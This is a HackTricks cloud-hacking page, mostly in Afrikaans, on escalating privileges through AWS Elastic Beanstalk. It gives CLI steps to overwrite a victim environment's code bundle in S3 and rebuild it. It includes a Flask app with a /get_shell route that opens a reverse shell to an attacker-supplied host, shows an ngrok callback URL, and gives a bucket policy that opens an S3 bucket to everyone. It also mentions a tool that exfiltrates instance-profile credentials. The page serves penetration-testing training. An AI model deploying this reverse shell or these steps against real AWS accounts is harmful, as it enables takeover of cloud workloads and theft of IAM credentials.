AWS - Elastic Beanstalk Privesc

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Elastic Beanstalk

Meer inligting oor Elastic Beanstalk by:

AWS - Elastic Beanstalk Enum

Warning

Om sensitiewe aksies in Beanstalk uit te voer, benodig jy ’n groot hoeveelheid sensitiewe toestemmings oor baie verskillende dienste. Jy kan byvoorbeeld die toestemmings nagaan wat gegee is aan arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk

elasticbeanstalk:RebuildEnvironment, S3 skryftoestemmings & baie ander

Met skryftoestemming oor die S3-bucket wat die code van die omgewing bevat en toestemmings om die toepassing te herbou (dit benodig elasticbeanstalk:RebuildEnvironment en ’n paar meer verbonde aan S3, EC2 en Cloudformation), kan jy die code wysig, die app herbou en die volgende keer wanneer jy die app besoek sal dit jou nuwe code uitvoer, wat die aanvaller in staat stel om die toepassing en die IAM role credentials daarvan te kompromitteer.

# Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip <files to zip>
# Upload code
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env
aws elasticbeanstalk rebuild-environment --environment-name "env-name"

elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole, en meer…

Die genoemde plus verskeie S3, EC2, cloudformation ,autoscaling and elasticloadbalancing toestemmings is nodig om ’n rou Elastic Beanstalk-scenario van nuuts af te skep.

  • Skep ’n AWS Elastic Beanstalk-toepassing:
aws elasticbeanstalk create-application --application-name MyApp

aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role

As ’n omgewing reeds geskep is en jy wil nie ’n nuwe een skep nie, kan jy net die bestaande een bywerk.

  • Pak jou toepassingskode en afhanklikhede in ’n ZIP-lêer:
zip -r MyApp.zip .
  • Laai die ZIP-lêer na ’n S3-bucket:
aws s3 cp MyApp.zip s3://elasticbeanstalk-<region>-<accId>/MyApp.zip
  • Skep AWS Elastic Beanstalk toepassingsweergawe:
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"
  • Ontplooi die toepassingsweergawe na jou AWS Elastic Beanstalk omgewing:
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0

elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, cloudformation:GetTemplate, cloudformation:DescribeStackResources, cloudformation:DescribeStackResource, autoscaling:DescribeAutoScalingGroups, autoscaling:SuspendProcesses, autoscaling:SuspendProcesses

Eerstens moet jy ’n legitieme Beanstalk-omgewing skep met die code wat jy in die victim wil laat loop volgens die vorige stappe. Potensieel ’n eenvoudige zip wat hierdie 2 lêers bevat:

from flask import Flask, request, jsonify
import subprocess,os, socket

application = Flask(__name__)

@application.errorhandler(404)
def page_not_found(e):
return jsonify('404')

@application.route("/")
def index():
return jsonify('Welcome!')


@application.route("/get_shell")
def search():
host=request.args.get('host')
port=request.args.get('port')
if host and port:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,int(port)))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
return jsonify('done')

if __name__=="__main__":
application.run()

Sodra jy jou eie Beanstalk env laat loop met jou rev shell, is dit tyd om dit na die slagoffer se env te migreer. Om dit te doen moet jy die Bucket Policy van jou Beanstalk S3 bucket opdateer sodat die slagoffer toegang daartoe kan kry (Let wel dat dit die Bucket vir ALMAL sal open):

{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"s3:ListBucket",
"s3:ListBucketVersions",
"s3:GetObject",
"s3:GetObjectVersion",
"s3:*"
],
"Resource": [
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
]
},
{
"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
"Effect": "Deny",
"Principal": {
"AWS": "*"
},
"Action": "s3:DeleteBucket",
"Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
}
]
}

# Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"

# These step needs the extra permissions
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0

# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528

Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).

The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections.

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks